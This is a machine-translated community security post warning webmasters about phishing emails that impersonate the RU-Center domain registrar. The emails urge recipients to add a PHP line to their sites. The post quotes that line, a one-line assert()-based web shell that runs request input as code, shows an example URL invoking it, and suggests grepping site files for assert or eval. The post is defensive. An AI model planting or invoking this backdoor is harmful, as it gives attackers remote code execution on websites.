betöltés...
A tetejére

Publikáció a közösségben "Információbiztonság és védelem a hackelés ellen"

Ez egy automatikus fordítás.
Ide kattintva elolvashatja a kiadványt az eredeti nyelven.

Ma néhány barátom levelet kapott, állítólag a RU -Center —től (a legnagyobb orosz domain névregisztrátor) — nic.ru, a következő tartalommal:

A leveleket az [email protected] címről küldtük . A levélben a támadók, akik a VV-Központ nevében képviseltetik magukat, javasolják a következő kód elhelyezését a webhelyen:

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

Sajnos sok kollégánk, akik "webmestereknek" nevezik magukat (számos webhelytulajdonos), nem ismerik a PHP —t, és nem gondolnak a fenti kód veszélyeire. Ha egy karakterláncot ad át paraméterként ennek a függvénynek, akkor azt az assert () PHP kódnak tekinti! Legyen óvatos!

Javaslom, hogy az assert vagy az eval parancsok segítségével vizsgálja meg a php —projektjeiben a sebezhetőséget. Ha ezek a parancsok megtalálhatók a projekt kódjában, ne essen pánikba — tanulmányozza az algoritmusukat. Az algoritmusok engedélyezett használata teljesen lehetséges. Abban az esetben, a fenti példában a parancs lehetővé teszi, hogy a támadók, hogy hívja a webhely, például a RUCENTER paraméter — http://sistema-audit.ru/?RUCENTER=PHP-code

Javasoljuk, hogy végezzen keresést például a grep —i —r 'assert' / home / www / mysite / * linux paranccsal, amely a webhelyfájlokat tartalmazó mappát jelzi, hogy megkapja a gyanús fájlok listáját. példány a használt kód.

Vigyázzon magára és webhelyeire!

Ez egy automatikus fordítás.
Ide kattintva elolvashatja a kiadványt az eredeti nyelven.